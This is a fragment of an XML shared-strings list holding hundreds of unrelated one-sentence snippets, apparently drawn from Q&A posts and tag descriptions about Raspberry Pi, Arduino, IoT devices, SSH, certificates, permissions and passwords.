    <t>This is a problem since our other devices like a Zebra scanner recognize and decode the DMC, so it shoudn't be the case X.</t>
  </si>
  <si>
    <t>PS: That user could be entered as an argument ofcourse.</t>
  </si>
  <si>
    <t>Another option that should work is just changing it to b"login: " but I've not ever tried that.</t>
  </si>
  <si>
    <t>This happens with scp and also for the password is a key generated.</t>
  </si>
  <si>
    <t>If it is recognized then try to give different device ID such as 1 or 2 or 3 rather than 0.</t>
  </si>
  <si>
    <t>Try changing that user to pi or give the right permissions to the kodi user</t>
  </si>
  <si>
    <t>Then you can simulate the navigation on the portal and input user / password</t>
  </si>
  <si>
    <t>Your files on libpam can't complete or corrupt.</t>
  </si>
  <si>
    <t>The following hack worked for me:
Run that on the BBB, then do a hard reset.</t>
  </si>
  <si>
    <t>In version 2 of the spec, they changed the name to carrier detect.</t>
  </si>
  <si>
    <t>This is a rather large security issue.</t>
  </si>
  <si>
    <t>I just noticed that before I even connect, I am already connected to the RPi using SSH.</t>
  </si>
  <si>
    <t>The problem is (as you already figured out), that your user is not allowed to access the  device.</t>
  </si>
  <si>
    <t>away from your WiFi network), you will probably want a cellular shield</t>
  </si>
  <si>
    <t>Pfx files are protected by a password to access.</t>
  </si>
  <si>
    <t>Fixed inconsistency in the format of PHP_AUTH_DIGEST between Apache 1 and 2 sapis.</t>
  </si>
  <si>
    <t>On rare occasions, task files become corrupted.</t>
  </si>
  <si>
    <t>Mosh is a replacement for SSH.</t>
  </si>
  <si>
    <t>Relevant Links:
Wikipedia entry on Obfuscation (Software)
International Obfuscated C Code Contest</t>
  </si>
  <si>
    <t>What if password contains non ASCII characters?</t>
  </si>
  <si>
    <t>Sorry For Identation Mistake.</t>
  </si>
  <si>
    <t>If it doesn't work you can always restart osmc via ssh (but it's not pretty at all)</t>
  </si>
  <si>
    <t>settings : {};
            u = username ?</t>
  </si>
  <si>
    <t>SSID and password are correct.</t>
  </si>
  <si>
    <t>Well, it's tough to say without knowing how your IR detector module works.</t>
  </si>
  <si>
    <t>This is because your terminal runs an  which knows your ssh identities.</t>
  </si>
  <si>
    <t>Also check 12.3 PERIPHERAL PRIVACY FLAG CHARACTERISTIC for details on the Attribute handle and value, maybe you can spot it in your device.</t>
  </si>
  <si>
    <t>I set the Modbus slave logging for getting more information:
[NOTE]:
Make sure your port should be has a root permission using:</t>
  </si>
  <si>
    <t>For example, you can make the Arduino code so that it requires some sort of secret to return the full page.</t>
  </si>
  <si>
    <t>Credentials are certainly good as I use them to generate SAS tokens and I've tried variations of the username (with/without domain) with no success.</t>
  </si>
  <si>
    <t>Connect it to the vncserver hosted on your RPi by typing in a password (set up a password yourself)
12.Now you can see the desktop of RPi on your laptop, and I opened my browser to show the shared WiFi connection is working as well.</t>
  </si>
  <si>
    <t>(I am already using it in a Foreground process)
Updates:
I tried the following lock but the problem continues.</t>
  </si>
  <si>
    <t>The file cannot be corrupted but it's OK to loose the most recent version if save failed because of power off etc.</t>
  </si>
  <si>
    <t>Android Q
  continues to use the READ_EXTERNAL_STORAGE and WRITE_EXTERNAL_STORAGE
  permissions, which correspond to the Storage user-facing runtime
  permission.</t>
  </si>
  <si>
    <t>Forgive me if I have completely missed something really obvious, but I know I am able to connect because if I type in the incorrect username or password I get an auth failure.</t>
  </si>
  <si>
    <t>I never did this step, because I am mainly interested in proximity applications and not fully fingerprint and indoor space.</t>
  </si>
  <si>
    <t>As for your problem, I would recommend that you double check that your API key is active.</t>
  </si>
  <si>
    <t>In addition to the OVF descriptor, the OVF package will typically contain one or more disk images, and optionally certificate files and other auxiliary files.</t>
  </si>
  <si>
    <t>If you still have problems, please supply your organization ID, device type, and device ID so we can check your details.</t>
  </si>
  <si>
    <t>Both libraries are pretty versatile and I'm not sure how to make them encrypt the same way.</t>
  </si>
  <si>
    <t>I'm making a program which uses SSH.NET but I don't know how to send a command to SSH server.</t>
  </si>
  <si>
    <t>Bypassing the shutdown procedure (immediate termination) may cause data loss or other problems.</t>
  </si>
  <si>
    <t>I don't need the opening number, I just need a method to make every tweet unique.</t>
  </si>
  <si>
    <t>You can put all your passwords in one database, which is locked with one master key or a key file.</t>
  </si>
  <si>
    <t>I suppose it has something to do with the sudo, but without sudo the program can't work, and if possible I don't want to make my user root user.</t>
  </si>
  <si>
    <t>Is there API that lists and allows us to connect to a specific wifi network by providing passcode via C# on Windows IoT Core?</t>
  </si>
  <si>
    <t>I can put leaks on the queues, but that's hardly resolving the issue.</t>
  </si>
  <si>
    <t>I want to make sure that I create correct certificates and link them to registry and device.</t>
  </si>
  <si>
    <t>But when you connect to your pi from outside of your home, you will have to make sure the program you use to connect can change which port ssh connects to.</t>
  </si>
  <si>
    <t>There should be no problem switching to webcrypto, see https://github.com/diafygi/webcrypto-examples#hmac for an example of how to make the call.</t>
  </si>
  <si>
    <t>Once verified, make sure you insert the card while the power is disconnected from your Pi.</t>
  </si>
  <si>
    <t>To make it secure, you'd need to develop some sort of API on your FHEM server (using both HTTPS and Key authentication or alike).</t>
  </si>
  <si>
    <t>Trying to ping the device to make sure if the ip address of device is correct or reachable.</t>
  </si>
  <si>
    <t>A frequent security mistake made at this point is to allow apache root permissions, or to escalate apache's abilities in some other way.</t>
  </si>
  <si>
    <t>Alternatively i have been thinking of setting up an ssh access to the pi, so i could run the script to reset from there.</t>
  </si>
  <si>
    <t>When XHTML is stored in script it must be properly encoded as an opaque string.</t>
  </si>
  <si>
    <t>As it currently stands, I have my fingerprint scanner (GT-511C3) connected to my Arduino and that works great.</t>
  </si>
  <si>
    <t>When I'm running this code:
on my local machine, it works flawlessly and says that the password is correct.</t>
  </si>
  <si>
    <t>An RFID reader that only performs anti-collision to get an ID is not sufficient.</t>
  </si>
  <si>
    <t>Generally, for beginners, just compile your program on your raspberry pi (with curl and crypto installed), it will spare you much trouble.</t>
  </si>
  <si>
    <t>Whereas your python script must have a blank environment, hence no access to your ssh-agent.</t>
  </si>
  <si>
    <t>Allows transparent decryption and execution of PHP scripts previously encoded with BLENC.</t>
  </si>
  <si>
    <t>How do I give node the permissions it needs to be able to create this folder?</t>
  </si>
  <si>
    <t>How would I go about wiping and starting over from the login screen?</t>
  </si>
  <si>
    <t>I am trying to change from el3 to el1 secure but i keep get the processor to hang somewhere.</t>
  </si>
  <si>
    <t>Any sort of key or algorithm you might use to come up with something to transmit can be copied and faked by a third party.</t>
  </si>
  <si>
    <t>It will automatically be set on login, to a value such as localhost:10.0.</t>
  </si>
  <si>
    <t>It doesn't look like you've handled authentication at all, so I'm guessing OAuth2Util is attempting to auth your script with reddit.</t>
  </si>
  <si>
    <t>So, I'm not sure it is possible to avoid reset (although, maybe some hacky way exists?</t>
  </si>
  <si>
    <t>Even if you don't connect these pins the SerialDevice.FromIdAsync() can get the valid device if the code and setting correctly.</t>
  </si>
  <si>
    <t>In evasion and recovery operations, the process whereby the identity of an evader is confirmed.</t>
  </si>
  <si>
    <t>interface=wlan0
driver=r8712u
ssid=raspberry
hw_mode=g
channel=6
macaddr_acl=0
auth_algs=1
ignore_broadcast_ssid=0
wpa=2
wpa_passphrase=passphrase
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP
rsn_pairwise=CCMP
Any help is welcome.</t>
  </si>
  <si>
    <t>After some research, I found that PAM is not allowing my root login.</t>
  </si>
  <si>
    <t>Pi is up and running, including WiFi, Apache 2.2, and secure terminal login (xterm?</t>
  </si>
  <si>
    <t>Server refused our key
pi@192.168.0.5's password:
How do I get it to work with my existing key?</t>
  </si>
  <si>
    <t>An FFMPEG trap generating a SSH session issue ?.</t>
  </si>
  <si>
    <t>I know $password, $dev and $command ('showw' in this case), but I have issue translating this into python.</t>
  </si>
  <si>
    <t>I open my management console on https port 9443\devicemgt and login as admin no problem.</t>
  </si>
  <si>
    <t>the constants), it was hacked very quickly.</t>
  </si>
  <si>
    <t>Then you could decode it at the other end and know when it was sent.</t>
  </si>
  <si>
    <t>Yes you may simply add shutdown permissions to Apache user, follow this tutorial.</t>
  </si>
  <si>
    <t>This doesn't work if your root user is protected by a password (which it really should!</t>
  </si>
  <si>
    <t>You can list all files with ls -a, which includes hidden files.</t>
  </si>
  <si>
    <t>Also to prevent script for being faked out, I would delete the file at startup.</t>
  </si>
  <si>
    <t>I found following password is useful.</t>
  </si>
  <si>
    <t>The error tells you must encode before creating your HMAC object.</t>
  </si>
  <si>
    <t>The errors encountered during validating the data input.</t>
  </si>
  <si>
    <t>Quick summary
Create a Login button on some View.</t>
  </si>
  <si>
    <t>Data Access is simply the authorization you have to access different data files.</t>
  </si>
  <si>
    <t>Also able to decode encoded location data.</t>
  </si>
  <si>
    <t>This last Python part is what it sends the 'Y' char and readline from the Arduino, again and again until there's no exception or corrupt data.</t>
  </si>
  <si>
    <t>I can also create a "fake" class for pinMode, etc.</t>
  </si>
  <si>
    <t>I just want to trust all certificates, since when the raspberry pi restart, sometime it change the ip address.</t>
  </si>
  <si>
    <t>im going out of my mind trying to solve this, im new at python and im trying to code an alarm system with a raspberry pi.</t>
  </si>
  <si>
    <t>I know how to use SSH, but I wanted to implement somthing similar in Python.</t>
  </si>
  <si>
    <t>In the MHAudioBufferPlayer.m class, I'm getting a bunch of Use of undeclared identifier errors for _gain, _playing, and _audioFormat.</t>
  </si>
  <si>
    <t>the door will unlock only when the knock of person matches with that stored in the arduino.</t>
  </si>
  <si>
    <t>Hardware details:
I do not have data sheet on photoresistor - I pulled it out of a busted night light.</t>
  </si>
  <si>
    <t>My question is what permissions does the bottle py and python need to run (which folders and what permissions)?</t>
  </si>
  <si>
    <t>Another way of asking would be: Is it possible to completely control X or an application running in it via ssh?</t>
  </si>
  <si>
    <t>The details of the University network are
WIRELESS
SSID: Uni-WiFi
WPA2 Enterprise
It uses PEAP (MSCHAPv2) to connect, meaning that I need to type in my university username and password.</t>
  </si>
  <si>
    <t>I still have a data corruption problem.</t>
  </si>
  <si>
    <t>But I cannot access to ssh, webmin and deluge web using my host name provided by No-IP.</t>
  </si>
  <si>
    <t>I read a file from the Web which contains WiFi SSID name and password.</t>
  </si>
  <si>
    <t>The problem is how can i protect it form overwriting?</t>
  </si>
  <si>
    <t>Basically EGit first told me that the server host key was not cached.</t>
  </si>
  <si>
    <t>What i want to say is that it doesn't seem a problem given by the SSH tunnel.</t>
  </si>
  <si>
    <t>I'm wondering if anybody can help me figure out what is causing the data I am sending to become corrupt.</t>
  </si>
  <si>
    <t>Is the shield not correctly identifying itself on the network?</t>
  </si>
  <si>
    <t>He will receive an username and a password when purchasing the system to log in to the server.</t>
  </si>
  <si>
    <t>For some reason, this caused the decoding to break down entirely.</t>
  </si>
  <si>
    <t>I would still be interested whether it is possible with luks-containers as well (I might try that out), but I will probably simply use truecrypt.</t>
  </si>
  <si>
    <t>I do not want to use a shared X11Session over SSH and so on.</t>
  </si>
  <si>
    <t>I do not want to execute a python-script in PHP because of right-privileges on Apache2-Server having to be adjusted.</t>
  </si>
  <si>
    <t>I am running Snort, which is packet detection software.</t>
  </si>
  <si>
    <t>However, when you're SSH'd into the Pi, you can start the deluged daemon by simply typing in "deluged".</t>
  </si>
  <si>
    <t>The Idea is:
The Mobile will have a email and a key as a intelligence card.</t>
  </si>
  <si>
    <t>However this involves me changing the permissions of boot.</t>
  </si>
  <si>
    <t>The library seems to work but I can't figure out the way to connect to a wifi using a password.</t>
  </si>
  <si>
    <t>Do you have any ideas to make this more secure?</t>
  </si>
  <si>
    <t>I cannot get serial communication working on Intel Galileo Gen 2.</t>
  </si>
  <si>
    <t>And here is my phpmyadmin privileges tab: 
The error comes up pretty much instantly so is it even trying to connect?</t>
  </si>
  <si>
    <t>I'm having trouble figuring out how I would get the embedded Keys in the second example.</t>
  </si>
  <si>
    <t>I've a project wherein I need a wifi device to be able to connect to a network via WPS push button.</t>
  </si>
  <si>
    <t>It always happens to 100% and I've never got a passed captcha from Selenium.</t>
  </si>
  <si>
    <t>All
Background:
if we want to access data form apple device,we should use iap protocol to connect between apple device and raspberry Pi.</t>
  </si>
  <si>
    <t>I have acquired the device address using the i2c scanner.</t>
  </si>
  <si>
    <t>I've ran into another problem while trying to create a login system on my website.</t>
  </si>
  <si>
    <t>Hi I am planning to use AWS IOT for my project which will have many devices and for each device we need to create certificate.</t>
  </si>
  <si>
    <t>I ran the manager as root, so I do not think it is a permissions issue.</t>
  </si>
  <si>
    <t>Now what i do from app side?I think its permission issue but not able to resolved please suggest.</t>
  </si>
  <si>
    <t>In what format are you supposed to supply the certificates (and keys) in the WifiClientSecure module?</t>
  </si>
  <si>
    <t>Problem: How do I secure access to the code and database?</t>
  </si>
  <si>
    <t>When I verify the code in Arduino there are no issues, so I'm not entirely sure why this isn't working.</t>
  </si>
  <si>
    <t>I then changed my wifi extender, so went to my raspberry pi and logged into the new wireless.</t>
  </si>
  <si>
    <t>The smatphone application sends an acknowledgment code when passing the person.</t>
  </si>
  <si>
    <t>The sent keycodes would ultimately let me control servos on a drone.</t>
  </si>
  <si>
    <t>My HostAPD config file is the same as the tutorial's and is as follows:
note: Password123 is not a password that I use and it will be changed!</t>
  </si>
  <si>
    <t>dtoverlay=vc4-kms-v3d,cma-256
mask_gpu_interrupt0=0x400
avoid_warnings=2
# Support official RPi display.</t>
  </si>
  <si>
    <t>I am getting the below error in the Cloudwatch logs even though booth the files exist and have no permission issue.</t>
  </si>
  <si>
    <t>Then i run lora-server and lora-app-server services in order to decrypt,decode and deduplicate the packets.</t>
  </si>
  <si>
    <t>I know that Apache runs as www-data group user and I don't know which folder/file I should give permissions so that it can access the PiCamera.</t>
  </si>
  <si>
    <t>I also found a post where it said that the hashed password must have a correct format.</t>
  </si>
  <si>
    <t>This isn't a problem until I try to upload my certificate to Alexa Developer Console in my Skill endpoint, it does not accept PFX.</t>
  </si>
  <si>
    <t>Or is this the wrong way to store information?</t>
  </si>
  <si>
    <t>I also found pySerial, which looks pretty legitimate.</t>
  </si>
  <si>
    <t>---&gt;
  System.Security.Authentication.AuthenticationException: The remote
  certificate is invalid according to the validation procedure.</t>
  </si>
  <si>
    <t>The part of the system log for the login on the sd card looks like this:
When I try to ssh to the Pi I get a broken pipe.</t>
  </si>
  <si>
    <t>Default has changed to a more secure dialect, SMB2.1 or later (e.g.</t>
  </si>
  <si>
    <t>I use the PyMonzo library to access the Monzo API, get my account information, and output that onto a screen.</t>
  </si>
  <si>
    <t>Motion detection is enabled with a mask.</t>
  </si>
  <si>
    <t>I am running into an issue with the following endpoint: 
champion-mastery/v4/champion-masteries/by-summoner/{encryptedSummonerId}
I am using newtonsoft json and RestSharp to get the results.</t>
  </si>
  <si>
    <t>I want to validate whether the data has been corrupted or not at the other end.</t>
  </si>
  <si>
    <t>The Pis internal bluetooth is deactivated, as I need its Pins for another device that is plugged to them.</t>
  </si>
  <si>
    <t>The login server responded me a HTML which redirected me to the original login webpage.</t>
  </si>
  <si>
    <t>Is this even possible directly without some sort of proxy.</t>
  </si>
  <si>
    <t>I want to script to not lock up so no one has to reset it during the exhibition.</t>
  </si>
  <si>
    <t>Current situation:
- 12V Access control device that is connected like this i.e.</t>
  </si>
  <si>
    <t>ESP32 collects the MAC address, device name, and service UUID and send the data to MySQL server.</t>
  </si>
  <si>
    <t>However unless you can get information on the protocol used, you do not really have much hope.</t>
  </si>
  <si>
    <t>Either way, you'll run into an issue: Before using the clear data, someone has to input the key.</t>
  </si>
  <si>
    <t>You can do this with recently announced Intel Galileo Development Kit.</t>
  </si>
  <si>
    <t>Have a look at this page for a password protected Arduino WebServer, I use this tip</t>
  </si>
  <si>
    <t>Traditionally this is solved with locks/mutexes, but javascript/node doesn't really have anything like that built-in.</t>
  </si>
  <si>
    <t>you have to deactivate apple ones and reinstall the old ftdi-driver.</t>
  </si>
  <si>
    <t>Then restart the SAMBA service with the new configuration:
sudo service samba restart
Finally, you have to add a password for each user.</t>
  </si>
  <si>
    <t>I guess you can't otherwise anyone would be able to get information on neighbours disregarding their privacy.</t>
  </si>
  <si>
    <t>And here is described a similar implementation of [HMAC] (en.wikipedia.org/wiki/Hash-based_message_authentication_code) and [SHA256] (en.wikipedia.org/wiki/SHA-2) for Arduino/AVR.</t>
  </si>
  <si>
    <t>You could issue individual certificates for each of your customers.</t>
  </si>
  <si>
    <t>Rather, you shall implement some sort of authorization.</t>
  </si>
  <si>
    <t>It is likely your .xauthority file is corrupted, or root owns that file which means it won't let you boot into the GUI.</t>
  </si>
  <si>
    <t>When you SSH into a linux box, it creates a new process for the SSH.</t>
  </si>
  <si>
    <t>This one isn't handling WiFi setup correctly.</t>
  </si>
  <si>
    <t>You are sending uninitialized data to your slave SPI device.</t>
  </si>
  <si>
    <t>Public key generation (it may be some hard-coded key, see the ESP8266 demo).</t>
  </si>
  <si>
    <t>Activation by Personalization (ABP) In some cases you might need to
  hardcode the DevAddr as well as the security keys in the device.</t>
  </si>
  <si>
    <t xml:space="preserve">
Unfortunately the button doesn't support captive portal networks.</t>
  </si>
  <si>
    <t>I wouldn't break the polyfuse or apply other hacks.</t>
  </si>
  <si>
    <t>The label field is also blank until you've done this, again for privacy reasons.</t>
  </si>
  <si>
    <t>This will result in the above issue, not able to retrieve the JWT token.</t>
  </si>
  <si>
    <t>The hard part is understanding the data protocol of the device -- this may, or may not, be documented.</t>
  </si>
  <si>
    <t>Therefore only files with 8 characters as name and 3 for file extension are valid.</t>
  </si>
  <si>
    <t>After that, you should use another function to associate your identifier with the value.</t>
  </si>
  <si>
    <t>Maybe didnt create the SSH connection?</t>
  </si>
  <si>
    <t>Gover is correct, though there is a [nasty] solution which keeps the anonymous enum:
This works because  still has a type.</t>
  </si>
  <si>
    <t>You don't need a hardware debouncing anymore using it.</t>
  </si>
  <si>
    <t>In other words, your certificate is trusted but not for signing other certificates.</t>
  </si>
  <si>
    <t>You need interception and so have you looked at Microsoft Fake framework and use a shim to isolate that assembly when testing.</t>
  </si>
  <si>
    <t>This is NON-OFFICIAL "hack" and I do not support this.</t>
  </si>
  <si>
    <t>Certificates should be used as a form of unique identity for a device.</t>
  </si>
  <si>
    <t>This means they cannot be recovered from Watson IoT Platform in any way - this is by secure design.</t>
  </si>
  <si>
    <t>You don't know what type of crash might corrupt the data.</t>
  </si>
  <si>
    <t>In fact, certificate is the recommended way to send data from a device.</t>
  </si>
  <si>
    <t>Warning: Thar be hacks ahead.</t>
  </si>
  <si>
    <t>Atmega328P used in official Arduino UNO does not have any factory-programmed unique ID.</t>
  </si>
  <si>
    <t>I know your program is just reading the file but try to extend your permissions.</t>
  </si>
  <si>
    <t>If the device is changing IoT hubs, the device registration with the initial IoT hub will be removed.</t>
  </si>
  <si>
    <t>I have fixed this in hidinput and will try to do a PR for it once I figure out how to also not have the keycodes go through to the shell that I started kivy from.</t>
  </si>
  <si>
    <t>This is the public piece of your SSH key.</t>
  </si>
  <si>
    <t>Problem is that you will also need to give the user access to whatever database that you want to access.</t>
  </si>
  <si>
    <t>For some reason, the permissions change during this process.</t>
  </si>
  <si>
    <t>Balanced is the payment platform for online and mobile-based marketplaces.</t>
  </si>
  <si>
    <t>Microsoft Tag is a barcode technology similar to QR codes, with some differences.</t>
  </si>
  <si>
    <t>It is a connection tool similar to UNIX ssh.</t>
  </si>
  <si>
    <t>The generation of barcode symbols (1d &amp; 2D) on printed media.</t>
  </si>
  <si>
    <t>you would normally have access to because you cannot remember the password used to protect it.</t>
  </si>
  <si>
    <t>ClearDB is a reliable, fault tolerant database-as-a-service for MySQL.</t>
  </si>
  <si>
    <t>Equivalence is a relationship in which two or more identifiers are abstractions for the same data structure.</t>
  </si>
  <si>
    <t>LeakCanary is a memory leak detection library for Android and Java.</t>
  </si>
  <si>
    <t>ZoneMinder is a Linux video camera security and surveillance solution</t>
  </si>
  <si>
    <t>PayUmoney is an online payment wallet provider.</t>
  </si>
  <si>
    <t>Many other virus scanners (about 30) and some other spam scanners (CRM114, DSPAM, Bogofilter) are supported too, as well as some other MTAs.</t>
  </si>
  <si>
    <t>Use for questions where type coercion is an issue with your code.</t>
  </si>
  <si>
    <t>broad term used for authentication and authorization systems</t>
  </si>
  <si>
    <t>checksum functions that are hard to forge.</t>
  </si>
  <si>
    <t>Gists can be created anonymously, or associated with your Github account.</t>
  </si>
  <si>
    <t>Certificates are usually issued (created) by a Certificate Authority (CA).</t>
  </si>
  <si>
    <t>Like other database files, they can also be password protected.</t>
  </si>
  <si>
    <t>The deployment server must also have ssh access to the production server:</t>
  </si>
  <si>
    <t>The UPN can be assigned, but is not required, when the user account is created.</t>
  </si>
  <si>
    <t>Source: KeePass Password Safe</t>
  </si>
  <si>
    <t>Data changed on the devices is also synchronized by RhoConnect to the backend system.</t>
  </si>
  <si>
    <t>LeakCanary is a memory leak detection library for android and java.</t>
  </si>
  <si>
    <t>The name of a computer is a human-readable identifier.</t>
  </si>
  <si>
    <t>If you type the PIN correctly, you should now be authorized to use
t as that user.</t>
  </si>
  <si>
    <t>If a precondition is violated, errors or security issues may occur.</t>
  </si>
  <si>
    <t>Associated standards are PA-DSS and PTS-DSS for payment applications and PIN transaction security.</t>
  </si>
  <si>
    <t>From PCI to SSL compliance, PrestaShop comes equipped with everything a merchant needs to be secure.</t>
  </si>
  <si>
    <t>The application itself logs into the DBMS, and handles any user account issues internally.</t>
  </si>
  <si>
    <t>ONG, is used to pay for transactions on the network and alleviate any network spam.</t>
  </si>
  <si>
    <t>Change password or email for registered users.</t>
  </si>
  <si>
    <t>If not, sometimes screen scraping is the only viable option.</t>
  </si>
  <si>
    <t>A hack is an inelegant or incomplete solution to a problem.</t>
  </si>
  <si>
    <t>This to be able to create sort of "Creatures" that could infect each others with infections.</t>
  </si>
  <si>
    <t>Does anyone have any ideas to what to look for next to get this file registered?</t>
  </si>
  <si>
    <t>There are few Bluetooth modules on the market such is Pan1321 from Panasonic which includes Apple authentication coprocessor and which could be used with iOS.</t>
  </si>
  <si>
    <t>What you need is event detection try something like this.</t>
  </si>
  <si>
    <t>Create a Repository named username.github.io where 'username' your GitHub username or Organisation name.</t>
  </si>
  <si>
    <t>I know the usb shield host works because the LCD display works and the barcode reader works in it.</t>
  </si>
  <si>
    <t>This idea is hacky, but will work.</t>
  </si>
  <si>
    <t>It is a lot like webapp but offers a bunch of features and goodies that webapp misses: i18n, sessions, own authentication, flash messages and more.</t>
  </si>
  <si>
    <t>I am Imran Ali Khan, Woking as developer in Wainfo Technologies
Participation
539 posts edited
834 helpful flags
5,328 votes cast
5,638 Reviews
273 Comments
673 Revisions
94 Suggestions
Why not Me 
Honestly I suspended two times when I was New (For Voting Fraud As I was think I was too smart ).</t>
  </si>
  <si>
    <t>While this may sound like overkill (and would be, if it's only for a brief test) it is the only way to really secure yourself against the possibility of reverse engineering taking place.</t>
  </si>
  <si>
    <t>To confirm this, use a connection string with a SharedAccessKey:
If that works, you need to look into renewing your SAS token (don't leave SharedAccessKey in product code!).</t>
  </si>
  <si>
    <t>I know only one open-source solution for this, it's the SDK provided by NIST for fingerprint recognition: NBIS.</t>
  </si>
  <si>
    <t>In the TWI interrupt service routine, we'll have to 
make sure the reason why we've entered the ISR is because we've been queried.</t>
  </si>
  <si>
    <t>The IMEI number is used by a GSM network to identify valid devices and
  therefore can be used for stopping a stolen phone from accessing that
  network.</t>
  </si>
  <si>
    <t>The IP camera has an HTTP interface where the arming and disarming can be done programmatically.</t>
  </si>
  <si>
    <t>I have requested the permissions on the manifest file but cant figure out whats wrong with this line
Thanks</t>
  </si>
  <si>
    <t>But im having some difficulty figuring out how to make a secure connections.</t>
  </si>
  <si>
    <t>Instead, you might want to look into SSH clients for windows and how to setup the corresponding server on the Raspberry (which will certainly run a Unix system).</t>
  </si>
  <si>
    <t>Since the cookie is random, it is very hard to figure out what a valid cookie is.</t>
  </si>
  <si>
    <t>Subjects must be resources which can either be named (using a IRI) or anonymous (known as Blank Nodes).</t>
  </si>
  <si>
    <t>It assumes a strict hierarchical system of certificate authorities (CAs) for issuing the certificates.</t>
  </si>
  <si>
    <t>Is there a setting that must be enabled to allow remote connections into MySQL?</t>
  </si>
  <si>
    <t>I would also like to put a push button on it that would resend the password incase the password box wasn't selected when the device was inserted.</t>
  </si>
  <si>
    <t>I made sure my account was linked to Microsoft Connect just in case this is the issue - it isn't.</t>
  </si>
  <si>
    <t>Assume also that you want to avoid/be bulletproof to situations like this:
before doing 2 secs stuff you MUST be sure that the 8th 250ms task is computed.</t>
  </si>
  <si>
    <t>* TO magento_user@localhost IDENTIFIED BY 'password';
FLUSH PRIVILEGES;
exit
unpack magento.</t>
  </si>
  <si>
    <t>The OpenPGP standard was originally derived from PGP (Pretty Good Privacy)</t>
  </si>
  <si>
    <t>Support under Windows XP is intentionally limited due security concerns.</t>
  </si>
  <si>
    <t>Simply put, this is a proxy server that works behind a NAT, even when the client is behind a NAT, without any 3rd party.</t>
  </si>
  <si>
    <t>root should generally not be messed with unless there's no other options such as using sudo.</t>
  </si>
  <si>
    <t>However if you are connecting to an Android peer then please generate your own unique UUID.</t>
  </si>
  <si>
    <t>ZKTeco focus on Biometrics of fingerprint, face recognition, finger vein and iris recognition, provides products of time attendance, access control and ...</t>
  </si>
  <si>
    <t>RFC 2898 issued by the IETF in 2000 is about "PKCS #5: Password-Based Cryptography Specification Version 2.0" and is mainly a republication of PKCS #5 v2.0 from RSA    Laboratories' Public-Key Cryptography Standards (PKCS) series</t>
  </si>
  <si>
    <t>Kismet works predominately with Wi-Fi (IEEE 802.11) networks, but can be expanded via plug-ins to handle other network types.</t>
  </si>
  <si>
    <t>The passwords would be selected based on which switch is on.</t>
  </si>
  <si>
    <t>I do not know how safe it is, and how to program it, to have on and off switch on my phone.</t>
  </si>
  <si>
    <t>I suspect the issue with how I am telling the driver which PIN to use.</t>
  </si>
  <si>
    <t>Is it possible to create a secure connection using motion?</t>
  </si>
  <si>
    <t>I have this code which I try to process is entering a password "78486" to shut down the sensor function !</t>
  </si>
  <si>
    <t>So as of right now when I arm the system and move my hand in front of the PIR sensor it says system triggered how do i get it to take a password from the user to deactivate the system.</t>
  </si>
  <si>
    <t>So in principle I would like to create something that looks like password screen in any Hollywood movie!</t>
  </si>
  <si>
    <t>host
bootstrap.tenant
bootstrap.user
bootstrap.password
My account url is - arpita.cumulocity.com.</t>
  </si>
  <si>
    <t>In order to log into MariaDB to secure it, we'll need the current
password for the root user.</t>
  </si>
  <si>
    <t>I have tried unplugging everything from the pins and the issue still occurs.</t>
  </si>
  <si>
    <t>Edit:
I was able to resolve my issue by creating new certificates for IoTHub.</t>
  </si>
  <si>
    <t>The wifi ssid I am connecting to does not have a password associated (work guest wifi with captive portal, using pyautogui to click through the captive portal) with it so wpa_passphrase is not an adequate solution to this problem.</t>
  </si>
  <si>
    <t>I have tried SSH, FTP &amp; SCP but can't get any to work and run into connection problems in my Python program.</t>
  </si>
  <si>
    <t>We are planning on using a secure element (example) to generate the key pairs.</t>
  </si>
  <si>
    <t>If not I am interested in hacking one together, but am unsure of where I should start.</t>
  </si>
  <si>
    <t>All AVR microcontrollers (and many if not most other brands as well) have an internal watchdog timer.</t>
  </si>
  <si>
    <t>For holistic reasons this sort of control should never be done in software.</t>
  </si>
  <si>
    <t>If there were something like XMPP that ran on the Arduino, it'd be a really stripped down presence protocol proxied through a smarter server-side process.</t>
  </si>
  <si>
    <t>Also, I know that it sounds simple, but the pi has often unreliable network capabilities.</t>
  </si>
  <si>
    <t>There's no obvious reason why root permissions would be required here.</t>
  </si>
  <si>
    <t>You can change both secure and insecure UUIDs.</t>
  </si>
  <si>
    <t>It is
efficient, flexible (lots of options) and works nicely over ssh.</t>
  </si>
  <si>
    <t>I found AnalysIR  tool very useful to decode IR protocols.</t>
  </si>
  <si>
    <t>i have some questions if you are using hc-05 it connected with  app with this device with password.</t>
  </si>
  <si>
    <t>I guess protocol or UUID is the reason, but I don't know the detail.</t>
  </si>
  <si>
    <t>SSH into the server with your terminal with the IP address you got when you created the server
Install Apache, MySQL, Python, PHPMyAdmin on the server.</t>
  </si>
  <si>
    <t>Do not enter any information in the below boxes like ip adress,router,dns server,dns search.</t>
  </si>
  <si>
    <t>I do not support the hacked way
I will only tell you what I have found that works
for today.</t>
  </si>
  <si>
    <t>If your concern is about just being able to acquire the SSID and password, it's much easier.</t>
  </si>
  <si>
    <t>For SensorId.HardwareId, you have multiple options that we recommend: either Device.HardwareId + SensorName or just SensorName if unique per device or just a GUID.</t>
  </si>
  <si>
    <t>But note that AppKey and DevEUI should always be unique for each end node.</t>
  </si>
  <si>
    <t>You'll also need to change the embedded CA Root Cert in the firmware to use Amazon's (or that of whatever hosting service that you're using).</t>
  </si>
  <si>
    <t>The underlying parser used in this situation (expat via XML::Parser) isn't known for wrongly claiming valid XML is invalid.</t>
  </si>
  <si>
    <t>Applications and services use unique ports to communicate with other devices over a network.</t>
  </si>
  <si>
    <t>Samsung KNOX Workspace provides robust, hardware and software integrated security for Samsung mobile devices.</t>
  </si>
  <si>
    <t>OnKeyListener is an interface definition for a callback to be invoked when a hardware key event is dispatched to this view.</t>
  </si>
  <si>
    <t>Controller Area Network (CAN) bus is a networking technology typically used in cars and other vehicles.</t>
  </si>
  <si>
    <t>NearBytes is a technology that allow devices to communicate each other by proximity without being connected to a network.</t>
  </si>
  <si>
    <t>ScraperWiki is an online tool for Screen Scraping.</t>
  </si>
  <si>
    <t>It can be used for providing distribution, discovery, and purchase of data via a decentralized network.</t>
  </si>
  <si>
    <t>It specializes in forging and decoding packets in almost any protocol.</t>
  </si>
  <si>
    <t>Users can pick their session type on a per-login basis.</t>
  </si>
  <si>
    <t>Shodan is a library that allows for port scanning of directories and banner searches.</t>
  </si>
  <si>
    <t>Please follow these guidelines when reporting security issues.</t>
  </si>
  <si>
    <t>You are forced to change this password and
create a normal user at first login.</t>
  </si>
  <si>
